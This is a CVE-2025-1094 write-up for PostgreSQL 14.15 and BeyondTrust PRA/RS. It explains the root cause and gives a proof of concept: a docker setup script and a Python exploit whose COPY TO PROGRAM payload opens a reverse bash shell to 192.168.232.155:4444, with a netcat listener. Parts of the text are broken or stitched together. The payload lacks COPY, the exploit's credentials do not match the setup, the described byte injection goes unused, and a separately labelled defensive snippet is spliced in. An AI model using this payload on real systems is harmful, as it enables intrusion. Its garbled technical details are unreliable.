Target
- PostgreSQL 14.15
- BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Software
- Impacted versions: PostgreSQL 14.15 and BeyondTrust products using it
Explain
CVE-2025-1094 is a SQL injection vulnerability in the psql interactive tool shipped with PostgreSQL 14.15. Because inputs are not validated properly, the vulnerability could allow an attacker to execute arbitrary commands; in conjunction with BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) software, this could lead to remote code execution (RCE).
Root Cause
The vulnerability occurred in the psql tool, which does not properly validate user input. In particular, within psql, meta commands (\!) combined with the COPY TO PROGRAM function can be used to execute shell commands. The vulnerability stems from a structural flaw that prevents PostgreSQL's tools from properly handling invalid UTF-8 strings. BeyondTrust's thin-scc-wrapper script passes the gskey value to the dbquote helper via an echo command, and dbquote relies on pg_escape_string(), which allows an attacker to inject a malicious byte sequence disguised as UTF-8 (0xC0 0x27) into the SQL query unsafely. This causes psql to stop executing the SQL query at that point, and the subsequent meta commands (such as \!) are executed, leading to SQL injection.
In addition, when combined with the CVE-2024-12356 vulnerability, which allowed argument injection because arguments were not handled safely (echo $gskey was used instead of echo "$gskey"), it could lead to remote code execution (RCE) over the WebSocket protocol. This is a significant design flaw in that RCE is possible through psql's incorrect UTF-8 handling alone.
Examples of vulnerable code:
PHP:
<?php
// Vulnerable pattern: execute_sql() still receives $input even though
// valid_utf8_check() reported that it is not well-formed UTF-8, so a byte
// sequence such as 0xC0 0x27 is handed to the database untouched.
if (valid_utf8_check($input) == false) {
    execute_sql($input);
}
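To show the defensive side of the root cause described above, here is an added example (not code from the page, from PostgreSQL or from BeyondTrust) of a strict UTF-8 gate applied before a value is quoted into a SQL literal or forwarded as a request parameter. The function names, the use of gskey as a parameter name in the sample, and the sample request itself are constructed assumptions.

```python
import urllib.parse


def is_valid_utf8(data: bytes) -> bool:
    """Strict UTF-8 check. Python's decoder rejects overlong lead bytes such as
    0xC0 and 0xC1, stray continuation bytes and truncated multibyte sequences."""
    try:
        data.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return False
    return True


def quote_literal(data: bytes) -> str:
    """Build a single-quoted SQL literal only after proving the bytes are well
    formed, so a sequence like 0xC0 0x27 never reaches a byte-oriented escaper
    that would treat 0xC0 as a lead byte and copy the following quote unescaped."""
    if not is_valid_utf8(data):
        raise ValueError("input is not valid UTF-8; refusing to build SQL")
    text = data.decode("utf-8")
    if "\x00" in text:
        raise ValueError("NUL byte is not allowed in a SQL literal")
    return "'" + text.replace("'", "''") + "'"


def find_invalid_utf8_params(raw_query: bytes) -> list:
    """Percent-decode each query-string parameter to raw bytes and report the
    names whose value is not valid UTF-8. Intended as a gate in front of any
    wrapper that forwards parameters (such as gskey) to a shell or to psql."""
    bad = []
    for part in raw_query.split(b"&"):
        if not part:
            continue
        name, _, value = part.partition(b"=")
        if not is_valid_utf8(urllib.parse.unquote_to_bytes(value)):
            bad.append(name.decode("ascii", errors="replace"))
    return bad


# Constructed sample request: 'user' carries a harmless apostrophe (%27), while
# 'gskey' carries the invalid lead byte 0xC0 (%C0) immediately before a quote.
SAMPLE_QUERY = b"user=o%27brien&gskey=abc%C0%27def"

if __name__ == "__main__":
    print("parameters with invalid UTF-8:", find_invalid_utf8_params(SAMPLE_QUERY))
    print("safe literal:", quote_literal(b"O'Brien"))
```

The same gate belongs in front of parameterized queries as well: rejecting malformed bytes at the boundary keeps the database driver's own quoting from ever seeing them.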
PoC
1. Vulnerable PostgreSQL 14.15 Environment Settings
Code:
#!/bin/bash
echo "[+] PostgreSQL 14.15 Downloading docker image..."
sudo docker pull postgres:14.15
echo "[+] PostgreSQL 14.15 Deploying container..."
sudo docker run --name vulnerable_postgres \
-e POSTGRES_USER=postgres \
-e POSTGRES_PASSWORD=postgres \
-e POSTGRES_DB=testdb \
-p 5432:5432 \
-d postgres:14.15
echo "[+] Waiting for PostgreSQL to initialize..."
sleep 10
echo "[+] Creating vulnerable table..."
# Assumed: the page does not show the command that feeds the SQL below into the
# container; psql inside the container with the credentials defined above is used here.
sudo docker exec -i vulnerable_postgres psql -U postgres -d testdb <<EOF
CREATE TABLE users (id SERIAL PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
echo "[✓] Setup complete. You are now running a vulnerable PostgreSQL 14.15!"
Save the script as setup.sh, grant it execute permission, and run it.
chmod +x setup.sh
sudo ./setup.sh
2. Exploit
Code:
import psycopg2

# PostgreSQL connection information
HOST = "127.0.0.1"
PORT = "5432"
DATABASE = "nullcave"
USER = "nullcave"
PASSWORD = "nullcavesec"

# Malicious SQL injection payload for RCE
payload = "users TO PROGRAM 'bash -c \"bash -i >& /dev/tcp/192.168.232.155/4444 0>&1\"';"

conn = None
try:
    conn = psycopg2.connect(host=HOST, port=PORT, dbname=DATABASE, user=USER, password=PASSWORD)
    cursor = conn.cursor()
    print("[+] Connected to PostgreSQL!")
    cursor.execute(payload)
    print("[✓] RCE execution complete! Check the Netcat listener")
except Exception as e:
    print("[-] Exploit Failed:", str(e))
finally:
    if conn:
        cursor.close()
        conn.close()
nc -lvnp 4444
Afterwards, run the PoC script to acquire the remote shell.
python3 poc.py